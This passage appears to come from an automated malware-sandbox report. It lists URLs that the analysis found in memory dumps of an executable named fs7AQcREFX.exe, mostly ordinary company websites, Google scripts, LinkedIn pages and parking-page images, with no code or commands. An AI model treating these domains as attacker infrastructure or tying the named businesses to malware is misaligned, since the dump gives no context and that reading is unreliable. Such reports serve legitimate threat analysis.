                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.396191509.0000000006F90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.397997118.0000000003600000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.398199427.0000000003610000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.fcwcvt.org/
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/api.js?render=explicit&#038;ver=3.3.1
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-CDTYFWBRBX
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407037442.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403046470.0000000007390000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403612159.00000000030C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.jacomfg.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.618533651.0000000000AC0000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000ABA000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.389748262.000000000617C000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.506150313.0000000000AC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.jenco.co.uk/
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ka-mo-me.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448586206.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.503667996.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.kernsafe.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.443924517.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.447789415.0000000003240000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.557525966.0000000004220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448518635.0000000003180000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.linkedin.com/company/comsit-distribution-gmbh/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.linkedin.com/company/pohl-food-service
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617381014.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.macromedia.com/go/getflashplayer
                      Source: fs7AQcREFX.exe, 00000000.00000002.731356544.00000000061D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.medius.si/
                      Source: fs7AQcREFX.exe, 00000000.00000003.511573881.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000ADA000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393651051.000000000617C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mqs.com.br/
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493212132.0000000003230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/bg.png)
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493212132.0000000003230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/error_board.png)
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493212132.0000000003230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/header_bg.png)
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493212132.0000000003230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/logo_off.gif)
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612322591.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495486174.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493212132.0000000003230000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.namebrightstatic.com/images/site_maintenance.png)
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.515047997.0000000000D70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.397997118.0000000003600000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.398199427.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.naoi-a.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.511573881.0000000000B14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nunomira.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.506622888.0000000004CB0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.633716697.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.512849987.0000000000B90000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.513941237.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401612520.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.399549475.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.517712783.00000000031F0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.390671488.0000000005150000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.514211859.0000000000D50000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.628447842.0000000002D00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olras.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.393699093.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.393801963.0000000000AC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.olras.com/5;
                      Source: fs7AQcREFX.exe, 00000000.00000003.407390186.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000002.716832808.0000000000B22000.00000004.00000020.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.448619967.0000000003230000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.408206344.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.525348360.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.402720609.0000000003850000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.407501333.0000000003110000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.401467373.0000000007390000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.609857809.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.569095277.0000000003830000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.493154321.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.520718818.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.411092041.0000000003160000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.440264697.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.436267530.0000000003220000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.437227453.0000000003180000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.403781144.0000000003100000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ora-ito.com/
                      Source: fs7AQcREFX.exe, 00000000.00000003.621337796.0000000006155000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ottospm.com/
